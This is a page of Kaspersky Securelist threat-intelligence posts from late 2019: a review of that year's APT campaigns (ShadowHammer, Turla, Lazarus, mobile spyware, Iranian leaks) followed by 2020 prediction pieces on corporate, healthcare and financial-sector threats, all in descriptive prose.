Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 12 min 49 sek zpět

APT review: what the world’s threat actors got up to in 2019

4 Prosinec, 2019 - 11:00

What were the most interesting developments in terms of APT activity during the year and what can we learn from them?

This is not an easy question to answer, because researchers have only partial visibility and it´s impossible to fully understand the motivation for some attacks or the developments behind them. However, let´s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.

Compromising supply chains

Targeting supply chains has proved very successful for attackers in recent years – high-profile examples include ShadowPad, ExPetr and the backdooring of CCleaner. In our threat predictions for 2019, we flagged this as a likely continuing attack vector. We didn’t have to wait very long to see this prediction come true.

In January, we discovered a sophisticated supply-chain attack involving a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to vendor’s laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer here and here.


Q3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.

In March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the résumés of the alleged attackers and a list of web shells – apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.

On April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, “along with information about their mother and spouse and etc.” for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale “highly confidential” information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.

Finally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute’s CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.

Close analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that lead us to believe that Sofacy/Hades may be connected to these leaks.

Lost in Translation and Dark Universe

The well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script – sigs.py – that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system – for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.

In 2019, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.

The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.

Mobile attacks

Mobile implants are now a standard part of the toolset of many APT groups; and we have seen ample evidence of this during 2019.

In May, the FT reported that hackers had exploited a zero-day vulnerability in WhatsApp, enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people’s chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit – and that seemed to be that. However, in October, the company filed a lawsuit accusing Israel-based NSO Group of having created the exploit. WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.

In July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim’s device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.

In August, Google’s Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. According to Google, the attackers used a number of ‘water-holed’ websites to deliver the exploits – possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received “thousands of visitors per week”. The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication.

In September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS – the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company’s previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google’s September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it’s clear that mobile exploits are a valuable commodity.

Established threat actors continue to revamp their tools

While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.

This year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely ‘fileless’: the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer’s registry for the malware to access when ready. The group uses two KopiLuwak analogues – the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.

We also observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a.pdb path left in some of the samples. We believe the same COMPfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don’t touch the network packets at all. Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process’s memory. Browsers use PRNG to generate the ‘client random’ sequence during the very beginning of the TLS handshake. Reductor adds the victims’ unique encrypted hardware- and software-based identifiers to this ‘client random’ field.

Zebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum – one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular. Later in the year, we discovered Platinum using a new backdoor, which we call Titanium, in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.

One of the key findings of our 2018 report on Operation AppleJeus was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It’s clear that Lazarus keeps updating its tools very quickly.

In Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank, to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank’s system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Andariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.

In October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.

The Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our ‘Unraveling the Lamberts Toolkit’ report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific NOBUS and OPSEC concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low level file-wiping functionality. We observed victims of Silver Lambert in China, in the Aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows – including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.

Early in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator’s flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor’s TTPs during the last year, LuckyMouse hasn’t changed any of them. The threat actor still relies on its own tools to get a foothold in the victim’s network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.

The HoneyMyte APT has been active for several years. The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it’s possible that the individual targets were related to geo-political activity in the region.

The Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following our original report on Icefog in 2013, the group’s operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China’s Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor’s lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.

Evolution of the ‘newcomers’

We first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and – somewhat surprisingly – in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.

In April, we published our report on TajMahal, a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim’s computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven’t found yet. This theory is supported by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FrutiyArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.

During February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.

In February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.

In Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.

Privacy matters

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email and 21 million unique password records. The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. It turned out that Collection #1 was just part of a larger dump of leaked credentials comprising 2.2 billion stolen account records. The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

Stolen credentials, along with other personal information harvested from data leaks, is valuable not only to cybercriminals but also to targeted attackers, including those wishing to track the activities of dissidents and activists in various parts of the world.

We’ve become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such ‘traditional’ forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. In August, two Israeli researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.

Moreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information – information that would prove very valuable to criminals and APT threat actors alike.

Final thoughts

We will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kasperksy.com

Corporate security prediction 2020

3 Prosinec, 2019 - 11:00

Moving to the cloud

The popularity of cloud services is growing, and threat actors are here to exploit the trend.

We are observing more and more cases where our customers’ infrastructure is partially or entirely located in the cloud – cloud migration has been the dominant trend of the past couple of years. This is resulting in a blurring of infrastructure boundaries. In 2020, we expect the following trends to emerge.

  • It will become more difficult for attackers to separate the resources of the targeted company from those of cloud providers. At the same time, it will be much more difficult for companies to detect an attack on their resources in the initial stages.

The transition to the cloud has blurred the boundaries of company infrastructures. As a result, it is becoming very difficult to target an organization’s resources in a precise manner. So, conducting an attack will become harder and the actions of threat actors will become more sophisticated or more frequent – relying on chance rather than planning. On the other hand, it will also be difficult for a company to identify targeted attacks at an early stage and separate them from the overall mass of attacks on the ISP.

  • Investigating incidents will become more complex and in some cases less effective.

Those who plan to deploy cloud infrastructure in 2020 need to talk in advance with their provider about a communications plan in the event of an incident, because time is of the essence when it comes to security incidents. It’s very important to discuss what data is logged, and how to back it up. Lack of clarity on such information can lead to complications or even make successful incident investigation impossible. We note, however, that awareness of cloud infrastructure security is not growing as fast as the the popularity of cloud services, so we expect to see an increase in the complexities of investigating incidents as well as a decrease in the effectiveness of incident response.

It’s also worth noting that when companies pass on their data to a cloud provider for storage or processing, they also need to consider whether the provider possesses the necessary level of cybersecurity. Even then, it is hard to be absolutely certain that the services they are paying for are really secure, as it requires a level of expertise in information security that not all technical officers possess.

  • Criminals will migrate to the cloud and forge ahead.

The increase in the availability of cloud services will allow not just companies but also attackers to deploy infrastructure in the cloud. This will reduce the complexity of an attack and, consequently, will increase their number and frequency. This could potentially affect the reputation of the cloud services themselves, as their resources will be used in large-scale malicious activity. To avoid this, providers will have to consider reviewing their security procedures and change their service policies and infrastructure.

Insiders threat

The good news is that we are observing an increase in the overall level of security of businesses and organizations. In this regard, direct attacks on infrastructure (for example, penetrating the external perimeter through the exploitation of vulnerabilities) is becoming much more expensive, requiring more and more skills and time for the attacker. As a result, we predict:

  • Growth in the number of attacks using social engineering methods.

In particular, this means phishing attacks on company employees. As the human factor remains a weak link in security, the focus on social engineering will increase as other types of attacks become more difficult to carry out.

  • Growth of the insider market.

Due to the increasing cost of other attack vectors, attackers will be willing to offer large amounts of money to insiders. The price for insiders varies from region to region and depends on the target’s position in the company, the company itself, its local rating, the type and complexity of insider service that is requested, the type of data that is exfiltrated and the level of security at the company.

There is a number of ways such insiders can be recruited:

  • By simply posting an offer on forums and offering a reward for certain information.
  • The attackers may disguise their actions so that employees don’t realize they are acting illegally, disclosing personal information or engaging in insider activity. For example, the potential victims may be offered a simple job on the side to provide information, while being reassured that the data is not sensitive, though it may in fact relate to the amount of funds in a bank client’s personal account or the phone number of an intended target.
  • Blackmailing. We also expect to see increased demand for the services of groups engaged in corporate cyber-blackmail and, as a consequence, an increase in their activity.

Cyber-blackmailing groups that collect compromising info on company employees (e.g. evidence of crimes, personal records and personal data such as sexual preferences) for the purpose of blackmail will become more active too in the corporate sector. Usually this happens in the following way: the threat actors take a pool of leaked emails and passwords, find those that are of interest to them and exfiltrate compromising data that is later used for blackmail or cyberespionage. The stronger the cultural specifics and regional regulations, the faster and more effective the attackers’ leverage is. As a result, attacks on users in order to obtain compromising data are predicted to increase.

Cybersecurity of connected healthcare 2020: Overview and predictions

3 Prosinec, 2019 - 11:00

More than two years after the infamous Wannacry ransomware crippled medical facilities and other organizations worldwide, the healthcare sector seems to be learning its lesson, as the number of attacked medical devices – doctors’ computers, medical servers and equipment – in 2019 decreased globally.

Our statistics showed that from 30% of computers and devices in medical organizations being infected in 2017, this number dropped to 28% in 2018, and we detect almost a third less attacks for the current year (19%).

As much as we want to believe everybody has woken up to the dangers of attacks like Wannacry, we still witnessed a number of ransomware attacks against healthcare facilities in several countries. There are two key reasons for such cyberattacks: a lack of attention to the risks of digitalization and a lack of cybersecurity awareness among staff at medical facilities.

Our conclusions about the human factor in cybersecurity are drawn from survey results. Kaspersky conducted a survey among healthcare sector employees in the US and Canada that revealed nearly a third of all respondents (32%) had never received any cybersecurity training from their workplace.

One-in-10 employees in management positions also admitted that they were unaware of a cybersecurity policy in their organization.

Another serious issue is the lack of proper security standards implemented in medical IoT devices. Throughout the year security researchers identified a number of vulnerabilities in different medical equipment. Hopefully, drawing attention to this subject will make manufacturers collaborate with the security community and contribute more to the creation of a safer environment in the world of smart medicine.

Forecast 2020
  • Interest in medical records on the dark web will grow. From our research into underground forums we see that such records are sometimes even more expensive than credit card information. It also opens up potentially new methods of fraud: armed with someone’s medical details it’s easier to scam the patient or his/her relatives.
  • Access to internal patient info makes it possible not only to steal but to modify records. This can lead to targeted attacks on individuals in order to mess up diagnostics. Diagnostic mistakes are the number one reason for patient deaths in the medical field according to statistics (even ahead of poorly qualified medical personnel).
  • The number of attacks on medical facility devices in countries that are just starting the digitalization process in the field of medical services will grow significantly next year. We expect to see the emergence of targeted ransomware attacks against hospitals in developing countries. Medical institutions are turning into industrial infrastructures. Loss of access to internal data (e.g. digital patient records) or internal resources (e.g. connected medical equipment inside a hospital) can halt patient diagnostics and even disrupt emergency aid.
  • Growing numbers of targeted attacks against medical research institutes and pharmaceutical companies conducting innovative research. Medical research is extremely expensive and some APT groups that are specialized in intellectual property theft will attack such institutions more frequently in 2020.
  • Thankfully, we’ve never seen attacks on implanted medical devices (e.g. neuro-stimulators) in the wild. But the fact that there are numerous security vulnerabilities in such devices means that it’s just a matter of time. The creation of centralized networks of wearable and implanted medical devices (as in the case of cardio stimulators) will lead to the emergence of a new threat: a single point of entry to attack all the patients using such devices.

Cyberthreats to financial institutions 2020: Overview and predictions

3 Prosinec, 2019 - 11:00

Key events 2019
  • Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered
  • Multi-factor authentication (MFA) and biometric challenges
  • Targeted attack groups specializing in financial institutions: splitting and globalization
  • ATM malware becomes more targeted
  • Card info theft and reuse: magecarting everywhere and battle of POS malware families in Latin America
Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered

During the last few years, cybercriminals have invested a lot in methods to bypass anti-fraud systems, because now it’s not enough just to steal the login, password and PII – they now need a digital fingerprint to bypass anti-fraud systems in order to extract money from the bank. During 2019, we identified a huge underground market called Genesis, which sells digital fingerprints of online banking users from around the globe.

From an anti-fraud system perspective, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device, and the personal behavioral attributes of the user. It includes the IP address (external and local), screen information (screen resolution, window size), firmware version, operating system version, browser plugins installed, time zone, device ID, battery information, fonts, etc. The device may have over 100 attributes used for browsing. The second part of a digital identity is the behavioral analysis.

As criminals are continuously looking for ways to defeat anti-fraud safeguards, they try to substitute the system’s real fingerprint with a fake one, or with existing ones stolen from someone else’s PC.

The Genesis Store is an online invitation-only private cybercriminal market for stolen digital fingerprints. At the time of our research, it offered more than 60 thousand stolen bot profiles. The profiles include browser fingerprints, website user logins and passwords, cookies, credit card information, etc. By uploading this fingerprint to the Tenebris Linken Sphere browser, criminals are able to masquerade as legitimate online banking users from any region, country, state, city, etc.

This type of attack shows that criminals have in-depth knowledge of how internal banking systems work and it’s a real challenge to protect against such attacks. The best option is to always use multi-factor authentication.

Multi-factor authentication (MFA) and biometric challenges

MFA is a challenge for cybercriminals. When MFA is used, they have to come up with techniques to bypass it. The most common methods used during the last year were:

  • Exploiting vulnerabilities and flaws in the configuration of the system. For example, criminals were able to find and exploit several flaws in remote banking systems to bypass OTPs (one time passcodes);
  • Using social engineering, a common method among Russian-speaking cybercriminals and in APAC region;
  • SIM swapping, which is especially popular in regions like Latin America and Africa. In fact, despite SMS no longer being considered a secure 2FA, low operational costs mean it’s the most popular method used by providers.

In theory, biometrics should solve a lot of problems associated with two-factor authentication, but practice has shown that it may not be so simple. Over the past year, several cases have been identified that indicate biometrics technology is still far from perfect.

Firstly, there are quite a few implementation problems. For example, Google Pixel 4 does not check if your eyes are open during the unlocking process using facial characteristics. Another example is the possibility of bypassing fingerprint authentication using the sensor under the screen on smartphones made by various manufacturers, including popular brands such as Samsung.

There is another trick that has been exploited in Latin America: a visual capturing attack. Cybercriminals installed rogue CCTV cameras and used them to record the PINs people used to unlock their phones. Such a simple technique is still very effective for both types of victims: those who use biometrics and those who prefer PINs to fingerprints or facial recognition. This is because, when a device is dusty or greasy (and the same applies to a user’s fingers), the best way to unlock a phone is to use a PIN.

